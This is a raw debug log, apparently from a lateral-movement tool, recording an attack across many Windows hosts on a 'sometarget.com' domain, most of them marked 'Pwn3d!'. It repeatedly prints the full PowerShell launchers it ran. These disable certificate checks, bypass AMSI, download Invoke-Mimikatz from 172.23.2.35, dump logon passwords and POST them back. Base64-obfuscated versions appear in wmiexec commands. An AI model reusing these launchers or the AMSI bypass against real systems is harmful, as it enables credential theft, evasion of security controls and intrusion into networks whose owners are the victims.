UAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB JUMPDR.sometarget.com 445 JUMPDR [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ TLPORTAL.sometarget.com 445 TLPORTAL [+] Executed launcher | |
MIMIKATZ ACTSM1.sometarget.com 445 ACTSM1 [+] Executed launcher | |
DEBUG Target system is JUMPDR.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\JUMPDR[\\PIPE\\atsvc] | |
DEBUG StringBinding: JUMPDR[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:JUMPDR.sometarget.com[49154] | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB NTISCISVR3V.sometarget.com 445 NTISCISVR3V [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ 172.23.2.51 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv On -;sv wI ec;sv eZ ((gv On).value.toString()+(gv wI).value.toString());powershell (gv eZ).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Target system is NTISCISVR3V.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\NTISCISVR3V[\\PIPE\\atsvc] | |
DEBUG StringBinding: ntiscisvr3v[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:NTISCISVR3V.sometarget.com[49154] | |
MIMIKATZ 172.23.2.119 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ JUMPDR.sometarget.com 445 JUMPDR [+] Executed launcher | |
MIMIKATZ 172.23.2.195 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV5.sometarget.com 445 SRV5 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv kD -;sv oA ec;sv pO ((gv kD).value.toString()+(gv oA).value.toString());powershell (gv pO).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
DEBUG Target system is SRV5.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV5[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV5[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV5.sometarget.com[49154] | |
MIMIKATZ 172.23.2.118 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "sv NL -;sv HL ec;sv WE ((gv NL).value.toString()+(gv HL).value.toString());powershell (gv WE).value.toString() CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ CDC03.sometarget.com 445 CDC03 [+] Executed launcher | |
MIMIKATZ 172.23.3.84 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB SRV4.sometarget.com 445 SRV4 [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
DEBUG Generated PS command: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
try{ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) | |
}catch{} | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
$request.ContentLength = $bytes.Length | |
$requestStream = $request.GetRequestStream() | |
$requestStream.Write($bytes, 0, $bytes.Length) | |
$requestStream.Close() | |
$request.GetResponse() | |
MIMIKATZ 172.23.3.60 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ ACCOG01.sometarget.com 445 ACCOG01 [+] Executed launcher | |
MIMIKATZ 172.23.3.245 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
MIMIKATZ 172.23.3.21 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Target system is SRV4.sometarget.com and isFDQN is True | |
DEBUG StringBinding: \\\\SRV4[\\PIPE\\atsvc] | |
DEBUG StringBinding: SRV4[49154] | |
DEBUG StringBinding chosen: ncacn_ip_tcp:SRV4.sometarget.com[49154] | |
DEBUG Executed command via wmiexec | |
DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) CgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAHQAcgB5AHsACgBbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQBVAHQAaQBsAHMAJwApAC4ARwBlAHQARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACAAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAJAB0AHIAdQBlACkACgB9AGMAYQB0AGMAaAB7AH0ACgBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAuAHAAcwAxACcAKQAKACQAYwBtAGQAIAA9ACAASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoAIAAtAEMAbwBtAG0AYQBuAGQAIAAnAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAIABzAGUAawB1AHIAbABzAGEAOgA6AGwAbwBnAG8AbgBwAGEAcwBzAHcAbwByAGQAcwAgAGUAeABpAHQAJwAKACQAcgBlAHEAdQBlAHMAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwAHMAOgAvAC8AMQA3ADIALgAyADMALgAyAC4AMwA1ADoANAA0ADMALwAnACkACgAkAHIAZQBxAHUAZQBzAHQALgBNAGUAdABoAG8AZAAgAD0AIAAnAFAATwBTAFQAJwAKACQAcgBlAHEAdQBlAHMAdAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcACgAkAGIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAkAGMAbQBkACkACgAkAHIAZQBxAHUAZQBzAHQALgBDAG8AbgB0AGUAbgB0AEwAZQBuAGcAdABoACAAPQAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkACgAkAHIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAAoAJAByAGUAcQB1AGUAcwB0AFMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQAKACQAcgBlAHEAdQBlAHMAdAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkA" | |
MIMIKATZ 172.23.3.244 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - | |
DEBUG Your pycrypto doesn't support AES.MODE_CCM. Currently only pycrypto experimental supports this mode. | |
Download it from https://www.dlitz.net/software/pycrypto | |
MIMIKATZ NTISCISVR3V.sometarget.com 445 NTISCISVR3V [+] Executed launcher | |
DEBUG add_credential(credtype=plaintext, domain=TEST, username=user, password=pass, groupid=None, pillaged_from=None) => None | |
SMB ACSEPM.sometarget.com 445 ACSEPM [+] TEST\user:pass (Pwn3d!) | |
DEBUG Generated PS IEX Launcher: | |
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} | |
IEX (New-Object Net.WebClient).DownloadString('https://172.23.2.35:443/Invoke-Mimikatz.ps1') | |
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' | |
$request = [System.Net.WebRequest]::Create('https://172.23.2.35:443/') | |
$request.Method = 'POST' | |
$request.ContentType = 'application/x-www-form-urlencoded' | |
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) | |
